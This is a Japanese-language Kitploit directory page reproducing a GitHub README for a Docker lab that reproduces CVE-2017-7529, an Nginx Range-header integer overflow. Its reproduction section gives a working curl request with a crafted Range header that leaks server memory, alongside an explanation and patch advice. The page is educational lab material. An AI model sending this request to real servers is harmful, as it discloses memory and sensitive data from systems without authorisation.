Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2017-7529- — CVE-2017-7529 Nginx整数オーバーフローの脆弱性のためのDockerベース再現環境。細工されたRangeヘッダーによる情報漏洩を実証し、ステップバイステップの悪用ガイド付き。 | Kitploit
ツール/GitHubGitHub/youngmin0104/cve-2017-7529-
脆弱性分析エクスプロイト情報収集ウェブセキュリティ学習と教育ラボと実践
GitHubyoungmin0104/cve-2017-7529-

CVE-2017-7529-

CVE-2017-7529 Nginx整数オーバーフローの脆弱性のためのDockerベース再現環境。細工されたRangeヘッダーによる情報漏洩を実証し、ステップバイステップの悪用ガイド付き。

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2017-7529-Nginx Range Header Integer Overflow

  • Nginxは高性能なWebサーバーであり、リバースプロキシ、キャッシュサーバーなどとして広く使用されているオープンソースのWebサーバーです。

  • Nginx 1.13.2以下のバージョンにおいて、整数オーバーフローにより攻撃者がRangeヘッダを操作し、本来の応答範囲を超えたメモリ断片や機密情報を漏洩できる脆弱性が存在します。


Reference

  • https://www.freebuf.com/articles/web/140178.html

脆弱な環境構成

  • 以下のコマンドを入力して脆弱なNginx環境を起動します。
root@kitploit:~
bash
docker compose up -d
  • サーバーが起動したら、ブラウザで次のアドレスにアクセスできます:
root@kitploit:~
arduino
http://your-ip:8080
  • Nginxのデフォルトページまたはカスタムindex.htmlページが表示されます。

脆弱性の再現

  • curlコマンドを使用して悪意のあるRangeヘッダリクエストを送信します:
root@kitploit:~
bash
curl -v -H "Range: bytes=-9223372036854,5" http://your-ip:8080/

-> 応答本文にページの一部の他に、奇妙なバイナリデータやメモリガベージが含まれる可能性があります。


動作原理の概要

  • この脆弱性は、Rangeリクエストを処理する際に負数と正数の整数計算過程でオーバーフローが発生し、本来意図していないメモリ領域まで応答に含めることになります。
  • これにより、攻撃者はキャッシュされたデータまたは機密情報の一部を抽出できます。

結論

  • この脆弱性は、単純なHTTPリクエストのみで情報漏洩 (Information Disclosure) を引き起こす可能性があります。

  • 機密性の高い設定情報やその他の漏洩可能性のあるデータが含まれる場合、深刻なセキュリティインシデントにつながる可能性があります。

  • パッチ: Nginx 1.13.3以上にアップデートすることを推奨


参考ファイル構成例

root@kitploit:~
bash

CVE-2017-7529/
├── Dockerfile
├── docker-compose.yml
├── nginx.conf
├── index.html
└── README.md  <-- 본 문서
ツールをダウンロード